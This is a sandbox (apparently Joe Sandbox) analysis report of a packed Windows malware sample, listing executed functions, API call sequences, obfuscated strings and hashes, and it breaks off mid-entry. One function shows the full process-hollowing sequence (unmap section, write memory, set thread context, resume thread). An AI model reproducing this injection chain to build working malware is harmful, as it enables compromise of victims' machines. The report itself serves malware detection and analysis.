DefineDosDeviceW 36737->36739 36741 402c0b VirtualAlloc 36738->36741 36742 402b8c EnumResourceNamesW 36738->36742 36774 403385 67 API calls 5 library calls 36739->36774 36744 402c45 GetTickCount 36741->36744 36747 402ba7 WinHttpOpen GetDiskFreeSpaceW OpenJobObjectW InterlockedDecrement 36742->36747 36743 402b5b 36775 403582 72 API calls 10 library calls 36743->36775 36744->36744 36746 402c4c 36744->36746 36749 402ca8 36746->36749 36752 402c81 InterlockedExchange LoadLibraryA ReadConsoleInputA 36746->36752 36776 403548 91 API calls __wcstoi64 36747->36776 36748 402b65 36748->36738 36753 402cc4 LCMapStringW InterlockedExchange OpenEventW 36749->36753 36755 402cf4 36749->36755 36751 402be6 36777 40355e 91 API calls __wcstoi64_l 36751->36777 36752->36746 36753->36749 36779 4029e0 27 API calls 36755->36779 36756 402bf0 36778 403184 68 API calls 6 library calls 36756->36778 36758 402cf9 36760 402d0f GetCurrentProcess GetCharWidth32A 36758->36760 36762 402d23 36758->36762 36763 402d2c 36758->36763 36760->36758 36761 402c06 36761->36741 36762->36758 36762->36763 36764 402d34 GetLastError 36763->36764 36766 402d5b 36763->36766 36764->36763 36765 402d3b 36764->36765 36765->36763 36767 402d80 GetFileAttributesA GetShortPathNameA GlobalCompact FreeEnvironmentStringsA SetComputerNameW 36766->36767 36768 402db7 InterlockedExchange 36766->36768 36769 402dc9 36766->36769 36767->36766 36768->36766 36772 402720 36769->36772 36771 402dce 36771->36666 36773 402755 LoadLibraryW 36772->36773 36773->36771 36774->36743 36775->36748 36776->36751 36777->36756 36778->36761 36779->36758 36780 5f0000 36783 5f0006 36780->36783 36784 5f0015 36783->36784 36787 5f07a6 36784->36787 36789 5f07c1 36787->36789 36788 5f07ca CreateToolhelp32Snapshot 36788->36789 36790 5f07e6 Module32First 36788->36790 36789->36788 36789->36790 36791 5f0005 36790->36791 36792 5f07f5 36790->36792 36794 5f0465 36792->36794 36795 5f0490 36794->36795 36796 5f04d9 36795->36796 36797 5f04a1 VirtualAlloc 36795->36797 36796->36796 36797->36796

                                                        Executed Functions

                                                        Function 00402B10 Relevance: 61.5, APIs: 27, Strings: 8, Instructions: 219memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • SetLastError.KERNEL32(00000000), ref: 00402B27
                                                        • DefineDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00402B4F
                                                        • _malloc.LIBCMT ref: 00402B56
                                                        • EnumResourceNamesW.KERNEL32(00000000,kokomaxojusokajucojafababoxosawolafufucawiyejuxewurifidaxegoladilahumipesovopog,00000000,00000000), ref: 00402B9B
                                                        • CoSuspendClassObjects.OLE32 ref: 00402BA1
                                                        • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00402BAC
                                                        • GetDiskFreeSpaceW.KERNEL32(00000000,?,?,?,?), ref: 00402BC3
                                                        • OpenJobObjectW.KERNEL32(00000000,00000000,nawis), ref: 00402BD0
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00402BDA
                                                        • _ldexp.LIBCMT ref: 00402C01
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00402C2F
                                                        • GetTickCount.KERNEL32 ref: 00402C45
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402C87
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00402C8F
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00402C9D
                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402CD5
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402CDD
                                                        • OpenEventW.KERNEL32(00000000,00000000,00000000), ref: 00402CE9
                                                        • GetCurrentProcess.KERNEL32 ref: 00402D0F
                                                        • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 00402D19
                                                        • GetLastError.KERNEL32 ref: 00402D34
                                                        • GetFileAttributesA.KERNEL32(sayemexesukayevudadotukawakebal), ref: 00402D85
                                                        • GetShortPathNameA.KERNEL32(jowalaserenadecibaf,?,00000000), ref: 00402D95
                                                        • GlobalCompact.KERNEL32(00000000), ref: 00402D99
                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402D9D
                                                        • SetComputerNameW.KERNEL32(zodow), ref: 00402DA8
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402DBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$ExchangeOpen$ErrorFreeLastName$AllocAttributesCharClassCompactComputerConsoleCountCurrentDecrementDefineDeviceDiskEnumEnvironmentEventFileGlobalHttpInputLibraryLoadNamesObjectObjectsPathProcessReadResourceShortSpaceStringStringsSuspendTickVirtualWidth32_ldexp_malloc
                                                        • String ID: Bq $`$tu$jowalaserenadecibaf$kokomaxojusokajucojafababoxosawolafufucawiyejuxewurifidaxegoladilahumipesovopog$nawis$sayemexesukayevudadotukawakebal$zodow${
                                                        • API String ID: 3256493818-1599021139
                                                        • Opcode ID: bf9affa40fc0374f3ca62506253b2e403d79d52b23fe62a2ec27c307109b290d
                                                        • Instruction ID: 27e7ae5b8b8d5546ca2e1133c51958c64e61e0f775f1a87b144f4ffeac6efbdd
                                                        • Opcode Fuzzy Hash: bf9affa40fc0374f3ca62506253b2e403d79d52b23fe62a2ec27c307109b290d
                                                        • Instruction Fuzzy Hash: 1F71D671900214BBD700AF64EE89F9A7778FB08305F11407AF545B71E0DAB86944CFAD
                                                        Function 00740110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00740156
                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0074016C
                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 00740255
                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00740270
                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00740283
                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0074029F
                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007402C8
                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007402E3
                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00740304
                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0074032A
                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00740399
                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007403BF
                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 007403E1
                                                        • ResumeThread.KERNELBASE(00000000), ref: 007403ED
                                                        • ExitProcess.KERNEL32(00000000), ref: 00740412
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                        • String ID:
                                                        • API String ID: 93872480-0
                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                        • Instruction ID: 8d536c9a11f34392e71dcdeeb797c813deb8bcb2b70e40e71d4d345bf600c66a
                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                        • Instruction Fuzzy Hash: 01B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D775AE41CF94
                                                        Function 00402DE0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 131 402de0-403111 132 403113-403118 131->132 133 403122-40312e call 402b10 132->133 134 40311a-403120 132->134 136 403133-40313e 133->136 134->132 134->133 137 403140-40314a 136->137 138 403157-40315a 137->138 139 40314c-403155 GetCurrentDirectoryA 137->139 138->137 140 40315c-403163 138->140 139->138
                                                        APIs
                                                        • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,432F6104,2B847A6C,5A8ECE52,6948C056,4A46582E,0865A1C9,5A8ECE52,4DEDD58E,7C6721A9,6C1250CB,242A0447,432F6104), ref: 00403155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID: !,j.$.XFJ$E*O<$K(5$\d4&${F?=$0B
                                                        • API String ID: 1611563598-2896200284
                                                        • Opcode ID: 33589bf779dfdcfb32545bc6c93503069b8d1126e6440b162e61c231dbd6680e
                                                        • Instruction ID: 335b1c4ba61258370bd90e66255bd992d818689f95479903e01e551c08cd5c75
                                                        • Opcode Fuzzy Hash: 33589bf779dfdcfb32545bc6c93503069b8d1126e6440b162e61c231dbd6680e
                                                        • Instruction Fuzzy Hash: 20A1DAB9E01259CBCB04CFEAD98959DFBB4BF09318F608118E812BB615C3349A86CF55
                                                        Function 005F07A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 167 5f07a6-5f07bf 168 5f07c1-5f07c3 167->168 169 5f07ca-5f07d6 CreateToolhelp32Snapshot 168->169 170 5f07c5 168->170 171 5f07d8-5f07de 169->171 172 5f07e6-5f07f3 Module32First 169->172 170->169 171->172 177 5f07e0-5f07e4 171->177 173 5f07fc-5f0804 172->173 174 5f07f5-5f07f6 call 5f0465 172->174 178 5f07fb 174->178 177->168 177->172 178->173
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005F07CE
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 005F07EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_VAIIBIHmtT.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: ce13af51a5bc28e3279e9c9736f30fdf45294fe70e0ae3af8c6bcaa211608e82
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: ADF0C2311023196BD7203AB5A88CA7FBAE8FF49725F141168E742910C1DA78F8054A60
                                                        Function 004037F5 Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                        • String ID:
                                                        • API String ID: 2477803136-0
                                                        • Opcode ID: 4aa17123169a9f647b61e8625abe71cb62d7366f6efa8d8edacce86b5bb3ce19
                                                        • Instruction ID: f2c74c07c22e1fedefcf420243682487841ead84586e024b1ab1f8ca8918139a
                                                        • Opcode Fuzzy Hash: 4aa17123169a9f647b61e8625abe71cb62d7366f6efa8d8edacce86b5bb3ce19
                                                        • Instruction Fuzzy Hash: B221A3B190070599EB14BF72A856B6F2AA89F0070EF1084BFF4157A1D2EA7C8A409B5D
                                                        Function 00740420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 141 740420-7404f8 143 7404ff-74053c CreateWindowExA 141->143 144 7404fa 141->144 146 740540-740558 PostMessageA 143->146 147 74053e 143->147 145 7405aa-7405ad 144->145 148 74055f-740563 146->148 147->145 148->145 149 740565-740579 148->149 149->145 151 74057b-740582 149->151 152 740584-740588 151->152 153 7405a8 151->153 152->153 154 74058a-740591 152->154 153->148 154->153 155 740593-740597 call 740110 154->155 157 74059c-7405a5 155->157 157->153
                                                        APIs
                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00740533
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                        • API String ID: 716092398-2341455598
                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                        • Instruction ID: 4e4f94b8b99673d68e637f544da2430eeb8095da14c0705427ac574b79db9511
                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                        • Instruction Fuzzy Hash: 78512B70D08388DEEB11CBD8C849BDDBFB2AF15708F144058D5447F286C3BA5668CBA6
                                                        Function 007405B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 158 7405b0-7405d5 159 7405dc-7405e0 158->159 160 7405e2-7405f5 GetFileAttributesA 159->160 161 74061e-740621 159->161 162 7405f7-7405fe 160->162 163 740613-74061c 160->163 162->163 164 740600-74060b call 740420 162->164 163->159 166 740610 164->166 166->163
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007405EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID: apfHQ$o
                                                        • API String ID: 3188754299-2999369273
                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                        • Instruction ID: f6166cd23224ffbf77b2cc31e6bbee5d3e4099575cce5e00e65eb9df6328bd24
                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                        • Instruction Fuzzy Hash: 5A011E70C0424CEADB10DBA8C5187AEBFB5AF41308F148099C5592B242D77A9B58CBA2
                                                        Function 0040267C Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 180 40267c-402700 181 402702-40270e 180->181 182 402755-4027b4 LoadLibraryW 180->182 181->182
                                                        APIs
                                                        • LoadLibraryW.KERNELBASE(00466600,00402DCE), ref: 004027AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: ed66df7c64455e5a93cd2ef8fb96cd029c232b4aa1285a2612a9f6c6703a7a44
                                                        • Instruction ID: 717ac444619ad65d5af4e7808bc2cc9c817e03435d1a66de99cca7db7c4f39a4
                                                        • Opcode Fuzzy Hash: ed66df7c64455e5a93cd2ef8fb96cd029c232b4aa1285a2612a9f6c6703a7a44
                                                        • Instruction Fuzzy Hash: 8AF074246193808AD7029F74FA253413771EF6A740F0694BAD049CB2B2F2F95955C76F
                                                        Function 00402720 Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 183 402720-4027b4 LoadLibraryW
                                                        APIs
                                                        • LoadLibraryW.KERNELBASE(00466600,00402DCE), ref: 004027AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 1a5211a52cd68e27f45746e73ddd9ed22603c5be81d4bc0dbf80c7ae03022757
                                                        • Instruction ID: 8a9a43746511672b4a0ee73f11dc87a61e4bb3563de9bf10a7e3a9da5911af9a
                                                        • Opcode Fuzzy Hash: 1a5211a52cd68e27f45746e73ddd9ed22603c5be81d4bc0dbf80c7ae03022757
                                                        • Instruction Fuzzy Hash: 93F06214628240C6E704DF65FA117112226EF68700F12A43AD109CB7B4F6FA8A55C76F
                                                        Function 004054FC Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 185 4054fc-40551e HeapCreate 186 405520-405521 185->186 187 405522-40552b 185->187
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00405511
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: 13a260a0a604567778b8c9f6304527e465eef30763dfe8667c31d4132a2fb43a
                                                        • Instruction ID: 0a9147f93b69d693ed341cec57dc28b6a389ab133384bf297220524970fa77db
                                                        • Opcode Fuzzy Hash: 13a260a0a604567778b8c9f6304527e465eef30763dfe8667c31d4132a2fb43a
                                                        • Instruction Fuzzy Hash: 49D05E369543486EEB005FB57D087663BECD384795F008477F90EC6590F574C9408A08
                                                        Function 005F0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 188 5f0465-5f049f call 5f0778 191 5f04ed 188->191 192 5f04a1-5f04d4 VirtualAlloc call 5f04f2 188->192 191->191 194 5f04d9-5f04eb 192->194 194->191
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005F04B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_VAIIBIHmtT.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: 4b3b82a961298218d86c1796e32c64b7e5f876bbfa977958dd870988312921ef
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: 7C112079A40208EFDB01DF98C985E98BFF5AF08351F058094FA489B362D375EA50DF40

                                                        Non-executed Functions

                                                        Function 004027D0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 148timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 0040286F
                                                        • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 004028B4
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,gosiyoruvazaligusa lejivo hutawucadajira,00000000,?,00000000), ref: 004028E1
                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 004028EC
                                                        • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004028FF
                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00402910
                                                        • ClearCommBreak.KERNEL32(00000000), ref: 00402918
                                                        • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00402924
                                                        • GetTempFileNameW.KERNEL32(00000000,?,00000000,00000000), ref: 00402937
                                                        • IsBadCodePtr.KERNEL32(00000000), ref: 0040293F
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00402951
                                                        • GetVersionExW.KERNEL32(?), ref: 0040295E
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00402968
                                                        • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 0040297E
                                                        • GlobalMemoryStatus.KERNEL32(00000000), ref: 00402986
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CommFileNameVersion$AttributesBreakClearCodeComputerConfigConsoleDriveEnumFormatFormatsGlobalIncrementInfoInputInterlockedLogicalMemoryMountNumberPointReadStatusStringsTempTimeVerifyVolume
                                                        • String ID: $gosiyoruvazaligusa lejivo hutawucadajira
                                                        • API String ID: 1733047232-2210585140
                                                        • Opcode ID: a795f326642849fca406862a36d0b6b592b0ee2c2e4b590090dbf391532df5ad
                                                        • Instruction ID: c87558101b908c45b2410442758a3621c0bbea39a87e5a00ceadae050fbc66b6
                                                        • Opcode Fuzzy Hash: a795f326642849fca406862a36d0b6b592b0ee2c2e4b590090dbf391532df5ad
                                                        • Instruction Fuzzy Hash: EC512D75E00208AFDB10DF95DD89B9EB7B4FB48701F108169E605BB2E0DBB4A944CF69
                                                        Function 004029E0 Relevance: 18.1, APIs: 12, Instructions: 98timeprocesspipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402A3F
                                                        • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00402A45
                                                        • GetConsoleAliasExesW.KERNEL32(?,00000000), ref: 00402A54
                                                        • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A6A
                                                        • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 00402A74
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A8E
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402AA0
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00402AA8
                                                        • TlsGetValue.KERNEL32(00000000), ref: 00402AAC
                                                        • SetEnvironmentVariableA.KERNEL32(00000000,?), ref: 00402ABB
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402ACD
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00402ADA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
